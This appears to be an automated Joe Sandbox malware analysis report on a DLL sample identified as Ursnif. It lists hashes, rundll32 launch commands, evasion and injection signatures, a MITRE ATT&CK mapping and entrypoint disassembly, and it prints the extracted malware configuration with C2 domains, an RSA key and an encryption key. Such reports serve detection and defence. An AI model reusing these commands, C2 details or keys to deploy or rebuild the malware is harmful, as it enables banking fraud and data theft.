Play interactive tour

Edit tour

Analysis Report 609a460e94791.tiff.dll

Overview

General Information

Sample Name:	609a460e94791.tiff.dll
Analysis ID:	410818
MD5:	50a299d1e92d9205e123404c8e05904d
SHA1:	c188272ab757dbbf14e74781fc90fcefe4aeb615
SHA256:	3b56b7298c366a323d28658a455abf0d4e78fa197a43ce13bedab05f26901d34
Tags:	BRTdllgeogoziisfbitaursnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains an invalid checksum

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 980 cmdline: loaddll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 4312 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 1752 cmdline: rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5824 cmdline: rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Hundredpopulate@@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4404 cmdline: rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Mark@@12 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1700 cmdline: rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Seefit@@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 5444 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "KujE77ctKyR8x3/dODwZbEsxGmck+FW9384s5u0Kacw8y1gCN+8m2bfjJPovkn+Uzufcdfss+a43eI6oHR1KgWQmvEAO6LK8tJv+Wl7iCBPJP7eef8xKeXht/Mhk1PSj7mHnJ9lcqKMtTteEdSecVvMRtb/WSKVTFfHDva9My7AJ/NbXqHdzCG7znACswLxD", "c2_domain": ["outlook.com/login", "gmail.com", "worunekulo.club", "horunekulo.website"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.590568897.0000000005168000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 1752	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.3.rundll32.exe.2c0a427.0.raw.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "KujE77ctKyR8x3/dODwZbEsxGmck+FW9384s5u0Kacw8y1gCN+8m2bfjJPovkn+Uzufcdfss+a43eI6oHR1KgWQmvEAO6LK8tJv+Wl7iCBPJP7eef8xKeXht/Mhk1PSj7mHnJ9lcqKMtTteEdSecVvMRtb/WSKVTFfHDva9My7AJ/NbXqHdzCG7znACswLxD", "c2_domain": ["outlook.com/login", "gmail.com", "worunekulo.club", "horunekulo.website"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Source: 609a460e94791.tiff.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 609a460e94791.tiff.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\die\Oh\ease_Slip\Suffix\fall.pdb source: loaddll32.exe, 00000000.00000002.591062302.000000006E1FB000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.592702264.000000006E1FB000.00000002.00020000.sdmp, 609a460e94791.tiff.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1D5AB0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,		0_2_6E1D5AB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1D5AB0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,		3_2_6E1D5AB0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.590568897.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1752, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.590568897.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1752, type: MEMORY

System Summary:

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1623A5 NtQueryVirtualMemory,	0_2_6E1623A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E161F14 NtMapViewOfSection,	3_2_6E161F14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1615F1 GetProcAddress,NtCreateSection,memset,	3_2_6E1615F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1623A5 NtQueryVirtualMemory,	3_2_6E1623A5

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E162184		0_2_6E162184
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E162184		3_2_6E162184

Source: 609a460e94791.tiff.dll

Binary or memory string: OriginalFilenamefall.dll8 vs 609a460e94791.tiff.dll

Source: 609a460e94791.tiff.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal60.troj.winDLL@12/0@0/0

Source: 609a460e94791.tiff.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Hundredpopulate@@8

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Hundredpopulate@@8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Mark@@12
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Seefit@@8
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Hundredpopulate@@8	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Mark@@12	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Seefit@@8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 609a460e94791.tiff.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 609a460e94791.tiff.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: 609a460e94791.tiff.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 609a460e94791.tiff.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 609a460e94791.tiff.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 609a460e94791.tiff.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 609a460e94791.tiff.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1617FA LoadLibraryA,GetProcAddress,

0_2_6E1617FA

Source: 609a460e94791.tiff.dll

Static PE information: real checksum: 0xdacb0 should be: 0xd1c24

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E162120 push ecx; ret	0_2_6E162129
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E162173 push ecx; ret	0_2_6E162183
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2306DB push ebp; retf 0000h	0_2_6E2306DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E162120 push ecx; ret	3_2_6E162129
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E162173 push ecx; ret	3_2_6E162183
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2306DB push ebp; retf 0000h	3_2_6E2306DC

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.590568897.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1752, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1911D0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_6E1911D0

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1D5AB0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,		0_2_6E1D5AB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1D5AB0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,		3_2_6E1D5AB0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1936C0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6E1936C0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1D0480 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,

0_2_6E1D0480

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1617FA LoadLibraryA,GetProcAddress,

0_2_6E1617FA

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1D4E20 mov ecx, dword ptr fs:[00000030h]	0_2_6E1D4E20
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1D4CE0 mov ecx, dword ptr fs:[00000030h]	0_2_6E1D4CE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1D4D80 mov ecx, dword ptr fs:[00000030h]	0_2_6E1D4D80
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1A7960 mov eax, dword ptr fs:[00000030h]	0_2_6E1A7960
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E22C536 mov eax, dword ptr fs:[00000030h]	0_2_6E22C536
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E22C46C mov eax, dword ptr fs:[00000030h]	0_2_6E22C46C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E22C073 push dword ptr fs:[00000030h]	0_2_6E22C073
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1D4E20 mov ecx, dword ptr fs:[00000030h]	3_2_6E1D4E20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1D4CE0 mov ecx, dword ptr fs:[00000030h]	3_2_6E1D4CE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1D4D80 mov ecx, dword ptr fs:[00000030h]	3_2_6E1D4D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1A7960 mov eax, dword ptr fs:[00000030h]	3_2_6E1A7960
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E22C536 mov eax, dword ptr fs:[00000030h]	3_2_6E22C536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E22C46C mov eax, dword ptr fs:[00000030h]	3_2_6E22C46C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E22C073 push dword ptr fs:[00000030h]	3_2_6E22C073

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1936C0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E1936C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1A4F60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E1A4F60
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1938F0 SetUnhandledExceptionFilter,	0_2_6E1938F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E193990 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E193990
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1936C0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E1936C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1A4F60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E1A4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1938F0 SetUnhandledExceptionFilter,	3_2_6E1938F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E193990 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6E193990

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.590298181.00000000011E0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.590108031.0000000003240000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.590298181.00000000011E0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.590108031.0000000003240000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.590298181.00000000011E0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.590108031.0000000003240000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: loaddll32.exe, 00000000.00000002.590298181.00000000011E0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.590108031.0000000003240000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E161237 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_6E161237

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E161CDD CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6E161CDD

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.590568897.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1752, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.590568897.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1752, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Application Shimming1	Process Injection12	Rundll321	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Application Shimming1	Process Injection12	LSASS Memory	Security Software Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	File and Directory Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Information Discovery3	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
609a460e94791.tiff.dll	0%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.rundll32.exe.2c50000.2.unpack	100%	Avira	HEUR/AGEN.1108168		Download File
4.2.rundll32.exe.31e0000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	410818
Start date:	11.05.2021
Start time:	11:01:34
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	609a460e94791.tiff.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.troj.winDLL@12/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.9% (good quality ratio 3.7%) Quality average: 79.1% Quality standard deviation: 29.5%
HCA Information:	Successful, ratio: 54% Number of executed functions: 22 Number of non-executed functions: 129
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll

Simulations

Behavior and APIs

Time	Type	Description
11:04:06	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.388590209681191
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Win16/32 Executable Delphi generic (2074/23) 0.21% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	609a460e94791.tiff.dll
File size:	841216
MD5:	50a299d1e92d9205e123404c8e05904d
SHA1:	c188272ab757dbbf14e74781fc90fcefe4aeb615
SHA256:	3b56b7298c366a323d28658a455abf0d4e78fa197a43ce13bedab05f26901d34
SHA512:	ec30f36d70ddbb6ba4aaccb3342e0a0ffbd586d2784370500a94e33aa650d1c56d3712ffc3a9e15a0558194ce26d1b76d9f2a8953220684bef634e57f4579df1
SSDEEP:	12288:mzCoYRvNZrA8Res/TPUOjUUGcqcoWEx9kMGUS6vOV5y4gnuD5wtqqB7ol:VdNZr5RLL1AZ/clUnHvk5hgU
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..`...........!.................0....................................................@..........................{..x..

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1033080
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6092C34C [Wed May 5 16:09:48 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	dc55991f7b8a912c780d10d352635290

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FA9008E6837h
call 00007FA9008E7507h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007FA9008E6616h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ecx
mov dword ptr [ebp-04h], ecx
mov esp, ebp
pop ebp
ret
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [eax]
mov dword ptr [ebp-04h], ecx
mov eax, dword ptr [ebp-04h]
mov esp, ebp
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push eax
call 00007FA9008E6809h
add esp, 04h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push eax
call 00007FA9008E68A9h
add esp, 04h
test eax, eax
je 00007FA9008E6833h
int3
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push eax
call 00007FA9008E6889h
add esp, 04h
test eax, eax
je 00007FA9008E6839h
mov ecx, 00000041h
int 29h
pop ebp
ret
int3
int3
int3
int3
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+08h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xc7bb0	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc7c28	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe8000	0x3a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe9000	0x51e0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc5ecc	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
